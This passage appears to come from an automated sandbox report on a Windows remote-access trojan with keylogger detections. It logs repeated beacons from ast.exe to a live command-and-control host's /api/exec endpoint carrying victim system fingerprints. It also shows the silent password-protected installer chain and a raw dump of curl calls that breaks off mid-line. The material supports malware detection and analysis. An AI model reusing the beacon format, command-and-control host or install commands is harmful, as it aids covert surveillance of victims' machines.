2024-11-19 17:56:53 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:53 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50148 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:54 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:54 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50151 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:55 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:55 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50154 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:56 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:56 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50157 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:57 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:57 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50160 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:58 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:58 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 50163 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:56:59 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:56:59 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 50166 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:00 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:00 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 50169 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:01 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:01 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 50172 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:02 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:02 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 50175 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:03 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:03 UTC | 269 | OUT | Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                50 | 192.168.2.4 | 50178 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-19 17:57:04 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                51 | 192.168.2.4 | 50181 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-19 17:57:05 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                52 | 192.168.2.4 | 50184 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-19 17:57:06 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                53 | 192.168.2.4 | 50187 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-19 17:57:08 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                54 | 192.168.2.4 | 50190 | 212.193.169.65 | 443 | 8036 | C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-19 17:57:12 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
                                                                                                                                2024-11-19 17:57:12 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64



                                                                                                                                Target ID:0
                                                                                                                                Start time:12:55:01
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\wjpP1EOX0L.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\wjpP1EOX0L.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:6'810'986 bytes
                                                                                                                                MD5 hash:34DC961FE0A98EA779D7B673A48C77A0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:1
                                                                                                                                Start time:12:55:01
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'179'648 bytes
                                                                                                                                MD5 hash:90FC739C83CD19766ACB562C66A7D0E2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:12:55:02
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\wjpP1EOX0L.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:6'810'986 bytes
                                                                                                                                MD5 hash:34DC961FE0A98EA779D7B673A48C77A0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:12:55:02
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'179'648 bytes
                                                                                                                                MD5 hash:90FC739C83CD19766ACB562C66A7D0E2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:12:55:38
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:8
                                                                                                                                Start time:12:55:38
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:12:55:38
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:43'520 bytes
                                                                                                                                MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:12:56:09
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\im\ast.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:7'543'992 bytes
                                                                                                                                MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:11
                                                                                                                                Start time:12:56:19
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\im\ast.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:7'543'992 bytes
                                                                                                                                MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:5.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:14.9%
                                                                                                                                  Total number of Nodes:1299
                                                                                                                                  Total number of Limit Nodes:116
26975 6b8d9e8b 26972->26975 26977 6b8d9eca curl_multi_cleanup 26974->26977 26981 6b8d9ef1 26974->26981 26976 6b8d9e64 26978 6b8d9ef7 curl_multi_poll 26979 6b8d9f50 curl_multi_remove_handle 26978->26979 26980 6b8d9f11 curl_multi_perform 26978->26980 26980->26979 26980->26981 26981->26978 26981->26979 26982 6b8d9f29 curl_multi_info_read 26981->26982 26982->26981 26983 6b8d9f3a curl_multi_remove_handle 26982->26983 26985 6b8f6db1 26984->26985 26987 6b8f6dba 26985->26987 26992 6b8d2370 curl_easy_init 26985->26992 26987->26972 26988 6b8f6e06 26988->26987 26998 6b8e8a20 26988->26998 26990 6b8f6e44 WSACreateEvent 26990->26987 26991->26976 26993 6b8d2387 26992->26993 26995 6b8d2390 26992->26995 26993->26988 26994 6b8d23c2 26994->26988 26995->26994 27005 6b8e1650 26995->27005 26999 6b8e8a2a 26998->26999 27000 6b8e8a37 socket 26998->27000 26999->26990 27001 6b8e8a4c 27000->27001 27002 6b8e8a48 27000->27002 27038 6b8d28e0 closesocket 27001->27038 27002->26990 27004 6b8e8a54 27004->26990 27006 6b8e165f 27005->27006 27025 6b8d23b8 27005->27025 27006->27025 27027 6b8f6bd0 27006->27027 27008 6b8e1675 27009 6b8e167f curl_multi_remove_handle 27008->27009 27010 6b8e1689 27008->27010 27009->27010 27011 6b8e1690 curl_multi_cleanup 27010->27011 27012 6b8e16a0 27010->27012 27011->27012 27033 6b8e1ce0 27012->27033 27014 6b8e16d9 27015 6b91d050 curl_slist_free_all 27014->27015 27017 6b8e1711 27015->27017 27016 6b8e5320 curl_url_cleanup 27018 6b8e1759 27016->27018 27017->27016 27019 6b8d6520 99 API calls 27018->27019 27020 6b8e1799 27019->27020 27021 6b8e18fe curl_slist_free_all 27020->27021 27022 6b8e1915 27021->27022 27023 6b8e1d40 curl_slist_free_all curl_slist_free_all 27022->27023 27024 6b8e191b 27023->27024 27026 6b9280b5 14 API calls 27024->27026 27025->26988 27026->27025 27028 6b8f6be2 27027->27028 27032 6b8f6c24 27027->27032 27028->27032 27037 6b909660 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27028->27037 
27030 6b8f6c11 27031 6b9006b0 74 API calls 27030->27031 27030->27032 27031->27032 27032->27008 27034 6b8e1cf3 27033->27034 27035 6b8e1650 106 API calls 27034->27035 27036 6b8e1d1f 27035->27036 27037->27030 27038->27004 27321 6b8e1930 27322 6b8e194e 27321->27322 27323 6b8e1650 106 API calls 27322->27323 27324 6b8e197a 27323->27324 27325 6b8e1650 106 API calls 27324->27325 27326 6b8e1986 ___scrt_fastfail 27325->27326 27353 6b8e2ea0 27326->27353 27328 6b8e1a5e 27329 6b8e19d1 27328->27329 27337 6b8e1bd0 83 API calls 27328->27337 27330 6b8e19b8 27330->27328 27330->27329 27331 6b8fcc20 2 API calls 27330->27331 27333 6b8e19f8 27331->27333 27332 6b8e1a0a 27333->27332 27334 6b8e1a66 27333->27334 27338 6b8e1a37 curl_maprintf 27333->27338 27335 6b90e5d0 2 API calls 27334->27335 27336 6b8e1a83 27335->27336 27339 6b8e1acb 27336->27339 27340 6b8e1a99 27336->27340 27337->27329 27338->27328 27338->27334 27342 6b8fcc20 2 API calls 27339->27342 27341 6b8d2a60 205 API calls 27340->27341 27343 6b8e1aac 27341->27343 27344 6b8e1ad7 27342->27344 27343->27328 27345 6b8e1b7d 27343->27345 27346 6b8e1afb 27344->27346 27348 6b8fcc20 2 API calls 27344->27348 27347 6b90e5d0 2 API calls 27345->27347 27349 6b8d36a0 88 API calls 27346->27349 27350 6b8e1b89 27347->27350 27348->27346 27351 6b8e1b17 27349->27351 27351->27345 27352 6b9006b0 74 API calls 27351->27352 27352->27345 27354 6b8e2ed5 27353->27354 27355 6b8e2ef8 27354->27355 27356 6b8e2f10 27354->27356 27357 6b91db71 __fassign 5 API calls 27355->27357 27450 6b8e2910 27356->27450 27359 6b8e2f0c 27357->27359 27359->27330 27360 6b8e2f16 27361 6b8e2f1f 27360->27361 27460 6b8e4aa0 27360->27460 27362 6b91db71 __fassign 5 API calls 27361->27362 27364 6b8e2f33 27362->27364 27364->27330 27365 6b91db71 __fassign 5 API calls 27367 6b8e370c 27365->27367 27367->27330 27368 6b8e2f40 27368->27361 27406 6b8e3251 27368->27406 27500 6b8e3a10 27368->27500 27369 6b8e2fe4 27533 6b8e4190 27369->27533 27371 6b8e2fac curl_msnprintf curl_url_set 27371->27361 
27371->27369 27375 6b8e308e 27375->27406 27551 6b8e1e00 27375->27551 27378 6b8e30ca 27380 6b8e30ed 27378->27380 27381 6b8e1e00 74 API calls 27378->27381 27378->27406 27379 6b8e1e00 74 API calls 27379->27378 27382 6b8e1e00 74 API calls 27380->27382 27383 6b8e3110 27380->27383 27380->27406 27381->27380 27382->27383 27384 6b8e3295 27383->27384 27390 6b8e31fc 27383->27390 27383->27406 27384->27361 27386 6b8e3469 27384->27386 27385 6b8e3275 27387 6b8e1e50 2 API calls 27385->27387 27388 6b90e5d0 2 API calls 27386->27388 27389 6b8e327f 27387->27389 27407 6b8e3472 27388->27407 27392 6b91db71 __fassign 5 API calls 27389->27392 27390->27385 27582 6b8d1be0 7 API calls __fassign 27390->27582 27394 6b8e3291 27392->27394 27393 6b8e3235 27395 6b8e5230 curl_maprintf 27393->27395 27393->27406 27394->27330 27396 6b8e3248 27395->27396 27397 6b8e3265 27396->27397 27396->27406 27583 6b90f7a0 76 API calls 27397->27583 27399 6b8e3635 27401 6b8e36d8 27399->27401 27585 6b8d2200 6 API calls __fassign 27399->27585 27405 6b9006b0 74 API calls 27401->27405 27402 6b8e35b0 27402->27399 27415 6b8e35b7 27402->27415 27403 6b8e3542 27403->27399 27584 6b8e0d50 97 API calls 27403->27584 27405->27406 27406->27365 27407->27403 27408 6b8e1bd0 83 API calls 27407->27408 27408->27407 27409 6b8e3752 27588 6b8d1be0 7 API calls __fassign 27409->27588 27410 6b8e367a 27411 6b8e36c2 27410->27411 27586 6b8d2000 QueryPerformanceCounter GetTickCount 27410->27586 27411->27409 27587 6b8d20c0 QueryPerformanceCounter GetTickCount 27411->27587 27413 6b8e369c 27417 6b8e36b9 27413->27417 27418 6b8e36c7 27413->27418 27421 6b9006b0 74 API calls 27415->27421 27422 6b8e1bd0 83 API calls 27417->27422 27419 6b9006b0 74 API calls 27418->27419 27419->27401 27420 6b8e373e 27424 6b8e3749 27420->27424 27425 6b8e3823 27420->27425 27426 6b8e362d 27421->27426 27422->27411 27423 6b8e378d 27423->27426 27432 6b9006b0 74 API calls 27423->27432 27429 6b8e1bd0 83 API calls 27424->27429 27428 6b9006b0 74 API calls 27425->27428 27555 6b8e1e50 
27426->27555 27427 6b8e3768 27427->27406 27427->27423 27430 6b9006b0 74 API calls 27427->27430 27428->27401 27429->27409 27430->27423 27432->27426 27433 6b8e37d4 27559 6b8e5230 27433->27559 27437 6b8e3808 27438 6b8e38ff 27437->27438 27439 6b8e3845 27437->27439 27441 6b8e3819 27437->27441 27440 6b8e8740 164 API calls 27438->27440 27438->27441 27439->27441 27577 6b8e8740 27439->27577 27444 6b8e3949 27440->27444 27441->27406 27442 6b8e39e3 27441->27442 27445 6b91db71 __fassign 5 API calls 27442->27445 27444->27441 27590 6b9005d0 74 API calls __fassign 27444->27590 27447 6b8e3a01 27445->27447 27447->27330 27448 6b8e38ae 27448->27441 27589 6b9005d0 74 API calls __fassign 27448->27589 27451 6b8e2924 27450->27451 27452 6b8e292d 27451->27452 27453 6b90e5d0 2 API calls 27451->27453 27452->27360 27454 6b8e29e9 27453->27454 27455 6b90e5d0 2 API calls 27454->27455 27456 6b8e29fc 27455->27456 27457 6b90e5d0 2 API calls 27456->27457 27459 6b8e2b82 27456->27459 27458 6b8e2bef 27457->27458 27458->27360 27459->27360 27461 6b8e4ab3 27460->27461 27591 6b8e5320 27461->27591 27463 6b8e4ac8 27464 6b8e4acf curl_url_dup 27463->27464 27465 6b8e4ae4 curl_url 27463->27465 27466 6b8e4aee 27464->27466 27465->27466 27467 6b8e4b53 27466->27467 27474 6b8e4ba3 27466->27474 27594 6b9105b0 47 API calls 27466->27594 27469 6b8e4c0e curl_url_get 27467->27469 27470 6b8e4b68 curl_url_set 27467->27470 27469->27474 27478 6b8e4c2a 27469->27478 27471 6b8e4bd2 curl_url_get 27470->27471 27470->27474 27472 6b8e4be7 27471->27472 27471->27474 27472->27469 27473 6b8e4c5e 27599 6b9005d0 74 API calls __fassign 27473->27599 27474->27368 27476 6b8e4b32 curl_maprintf 27476->27467 27476->27474 27477 